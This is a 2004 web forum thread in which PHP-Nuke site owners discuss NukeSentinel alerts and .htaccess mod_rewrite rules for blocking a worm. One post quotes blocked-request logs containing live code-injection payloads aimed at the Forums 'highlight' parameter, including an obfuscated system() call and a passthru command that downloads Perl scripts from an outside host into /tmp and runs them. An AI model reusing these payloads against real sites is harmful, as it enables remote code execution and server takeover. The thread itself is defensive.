Sentinel going crazy...im being attacked

Client Joined: Apr 10, 2004 Posts: 649 Location: UK

lol I didnt think it could be that simple so didnt do it doh!

There was me looking for a complicated solution

Thanks Raven.

Hope my dumbness helps lots of others like me (thats my way of getting out of being a real thicko at this lol)

Posted: Sun Dec 26, 2004 10:24 am

ermm Raven do we need to put

RewriteEngine on (at the beginning)
and

RewriteEngine Off (at the end of the new code?)

registered · New Member Joined: Dec 24, 2004 Posts: 5

Place RewriteEngine on at the very top of your .htaccess file, I wouldn't worry about RewriteEnging Off, just leave that out altogether.

Also, if it would help you, I can talk to you on one of the IM services and fix your .htaccess file up for you Smile

Viper

Posted: Sun Dec 26, 2004 12:29 pm

Hi Viper

Thanks I'll put that back in then cos I'm getting loads of emails again from Sentinel since I left the rewrite engine bit off the code.

If I get stuck I'll get back to you here, thanks for offering, much appreciated.

New Member Joined: Dec 26, 2004 Posts: 3

Sorry Raven I am little be confused

In the last 3 days my sentinel 2.1.2 blocked about 100 ips for day and I received 300 email like this, buth with different ip Smile

Date & Time: 2004-12-26 23:50:25
Blocked IP: 69.72.230.138
User ID: Anonymous (1)
Reason: Abuse-Script
--------------------
User Agent: lwp-trivial/1.41
Query String: www.gamesclan.it/modules.php?name=Forums&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(109)%252echr(101)%252echr(109)%252echr(9 Cool

%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(97)%252echr(111)%252echr(108)%252echr(46)%252echr(99)%252echr(111)%252echr(109)%252echr(47)%252echr(110)%252echr(101)%252echr(119)%252echr(111)%252echr(107)%252echr(56)%252echr(52)%252echr(4 Cool

%252echr(56)%252echr(47)%252echr(121)%252echr(97)%252echr(121)%252echr(59)%252echr(46)%252echr(47)%252echr(121)%252echr(97)%252echr(121)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(109)%252echr(101)%252echr(109)%252echr(9 Cool

%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(97)%252echr(111)%252echr(108)%252echr(46)%252echr(99)%252echr(111)%252echr(109)%252echr(47)%252echr(104)%252echr(121)%252echr(100)%252echr(114)%252echr(111)%252echr(4 Cool

%252echr(4 Cool

%252echr(47)%252echr(119)%252echr(111)%252echr(114)%252echr(109)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(119)%252echr(111)%252echr(114)%252echr(109)%252echr(46)%252echr(116)%252echr(120)%252echr(116))%252e%2527
Forwarded For: none
Client IP: none
Remote Address: 69.72.230.138
Remote Port: 36273
Request Method: GET
-------------------------------------------------------

Date & Time: 2004-12-26 23:46:37
Blocked IP: 193.178.158.26
User ID: Anonymous (1)
Reason: Abuse-Script
--------------------
User Agent: LWP::Simple/5.64
Date & Time: 2004-12-26 23:46:37
Blocked IP: 193.178.158.26
User ID: Anonymous (1)
Reason: Abuse-Script
--------------------
User Agent: LWP::Simple/5.64
Query String: www.gamesclan.it/modules.php?name=Forums&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20http://fff.gratishost.com/sess_0bc3910d07edb36750a9babbd179edb2;perl%20sess_0bc3910d07edb36750a9babbd179edb2;wget%20http://fff.gratishost.com/wow.a;perl%20wow.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527
Forwarded For: none

----------------------------------

I read all topics befor write this message, about the Worm, about the Agent and about the rewrite, but I am little be confused.

I am under attack ? or it is a new agent/spiders not tratted correctly buy Sentinel ?
I read your fix in .Htaccess but I don't have the mod rewrite installed.

Could you explain me How fix this problem in simply words please

Thanks in advance

Site Admin/Owner Joined: Aug 27, 2002 Posts: 17088

NukeSentinel traps it, but mod_rewrite is a way to stop it before it ever reaches your site. If your host doesn't offer mod_rewrite then they are ages behind. Seriously, I woul try to change hosts. it's so simple to install.

Posted: Sun Dec 26, 2004 5:19 pm

k thanks sorry for my host lol Smile

But is the only whay to stop it ????

Are dangerus hack attack ????

Posted: Sun Dec 26, 2004 5:21 pm

NukeSentinel is stopping it, like I said. Yes, it is dangerous but so far, not to worry.

Posted: Sun Dec 26, 2004 5:43 pm

k thanks a lot !

Client Joined: Dec 24, 2004 Posts: 194 Location: Michigan

hey dont thank me man i thank you Smile

all i did was trying to see if it made a diff ...and it did i copy and pasted your code and moved the options-index to the bottom with a few spaces in between the pasted code and wa la no emails today ,thanks so much for you being here ....i will update to the code posted above ..it seems the user agent has been all the same (LWP) i must of just misread and thought it was diff. on one of several i was checking out...is this what you are referring to as the redirect url ?

Quote:

RewriteRule ^.*$ emailsforyou.php [L]

HAPPY HOLIDAYS

P.s
from this post

Quote:

Posted: Sun Dec 26, 2004 3:17 pm

to this Posted: Mon Dec 27, 2004 4:05 pm i still sit at 633 blocked Cheers

hmm seems i need to change the time in my profile its actually 1:15 am

Posted: Mon Dec 27, 2004 12:52 am

never mind the redirect question found the answer in your sticky Embarassed

Posted: Mon Dec 27, 2004 5:01 am

Great! I appreciate your support Wink

Regular Joined: Jun 08, 2004 Posts: 64

I have been hit by two more

Code:

RewriteCond %{REQUEST_URI} ^envidiosos                [NC,OR]





RewriteCond %{REQUEST_URI} ^civa                [NC,OR]

civa.org and envidiosos.org

visualcoders domain has been suspended.

Posted: Mon Dec 27, 2004 7:28 am

Thanks!

Posted: Mon Dec 27, 2004 8:08 pm

Here's another compromised site by LW::Simple

http://filepack.superbr.org